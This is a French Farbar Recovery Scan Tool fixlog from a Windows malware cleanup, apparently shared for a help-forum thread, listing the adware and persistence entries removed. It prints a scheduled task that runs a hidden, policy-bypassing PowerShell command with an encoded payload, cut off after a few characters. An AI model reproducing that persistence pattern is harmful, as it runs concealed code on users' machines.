cjoint

Publicité


Publicité

Format du document : text/plain

Prévisualisation

Résultats de correction de Farbar Recovery Scan Tool (x64) Version:21-02-2016 01
Exécuté par Langlois (2016-02-23 20:33:07) Run:1
Exécuté depuis C:\Users\Langlois\Desktop
Profils chargés: Langlois (Profils disponibles: Langlois)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
CloseProcesses:
CreateRestorePoint:
Hosts:
HKLM-x32\...\Run: [mbot_fr_014010247] => "C:\Program Files (x86)\mbot_fr_014010247\mbot_fr_014010247.exe"
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
CHR Extension: (Protection Web Avira) - C:\Users\Langlois\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2016-02-23]
C:\Windows\System32\Tasks\{7D7A7A47-050D-0E04-0C11-780E7A7D110D}
2016-02-20 20:17 - 2016-02-20 20:17 - 00000000 ____D C:\Users\Langlois\AppData\Local\Avira
2016-02-20 20:00 - 2016-02-20 20:19 - 00000000 ____D C:\ProgramData\Avira
2016-02-20 20:00 - 2016-02-20 20:19 - 00000000 ____D C:\Program Files (x86)\Avira
2016-02-10 10:41 - 2013-12-20 23:59 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\etc\file.exe
Task: {1F7D1411-EA45-459B-8857-3A5333F4B0F3} - System32\Tasks\{7D7A7A47-050D-0E04-0C11-780E7A7D110D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (l'élément de données a 9100 caractères en plus).
FirewallRules: [{810F7C2E-A5E0-4B56-9776-AD51189C87C3}] => (Allow) C:\Users\Langlois\AppData\Local\BoBrowser\Application\bobrowser.exe
C:\Users\Langlois\AppData\Local\BoBrowser

*****************

Processus fermé avec succés.
Le Point de restauration a été créé avec succès.
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\mbot_fr_014010247 => valeur supprimé(es) avec succès
"HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SDWinLogon" => clé supprimé(es) avec succès
C:\Users\Langlois\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk => non trouvé(e)
C:\Windows\System32\Tasks\{7D7A7A47-050D-0E04-0C11-780E7A7D110D} => déplacé(es) avec succès
"C:\Users\Langlois\AppData\Local\Avira" => non trouvé(e).
C:\ProgramData\Avira => déplacé(es) avec succès
C:\Program Files (x86)\Avira => déplacé(es) avec succès
C:\Windows\system32\Drivers\etc\file.exe => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1F7D1411-EA45-459B-8857-3A5333F4B0F3}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1F7D1411-EA45-459B-8857-3A5333F4B0F3}" => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\{7D7A7A47-050D-0E04-0C11-780E7A7D110D} => non trouvé(e).
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7D7A7A47-050D-0E04-0C11-780E7A7D110D}" => clé supprimé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{810F7C2E-A5E0-4B56-9776-AD51189C87C3} => valeur supprimé(es) avec succès


==== Fin de Fixlog 20:08:16 ====

Publicité


Signaler le contenu de ce document

Publicité